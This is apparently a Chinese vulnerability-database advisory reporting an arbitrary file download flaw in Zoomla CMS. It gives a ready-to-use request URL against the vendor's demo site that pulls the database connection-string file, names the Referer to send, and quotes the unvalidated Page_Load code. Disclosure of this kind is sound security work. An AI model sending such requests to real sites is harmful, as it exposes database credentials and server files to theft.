逐浪CMS任意文件下载(官方DEMO演示)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 目前试了最新的逐浪CMS2 x2.0可以,然后官网的DEMO也可以 ### 详细说明: Config/ConnectionStrings.config为数据库连接文件,当然,整站都可以下载,只要换下就得了 ``` http://demo.zoomla.cn/user/iServer/FiServerInfo.aspx?menu=filedown&filepath=//Config//ConnectionStrings.config ``` referrer: ``` http://demo.zoomla.cn/user/iServer/FiServer.aspx ``` [<img src="https://images.seebug.org/upload/201408/0415222836808150d9ff4239e8aeccda57069917.png" alt="zoomla.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/0415222836808150d9ff4239e8aeccda57069917.png) ### 漏洞证明: FiServerInfo.aspx对应的page_load函数,未经验证范围,导致全站可下载 ``` protected void Page_Load(object sender, EventArgs e) { if (!string.IsNullOrEmpty(base.Request.QueryString["menu"]) && (base.Request.QueryString["menu"] == "filedown")) { string path = base.Request.QueryString["filepath"]; if (path != "") { FileInfo info = new FileInfo(base.Server.MapPath(path)); if (info.Exists) { base.Response.Clear(); base.Response.AddHeader("Content-Disposition",...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息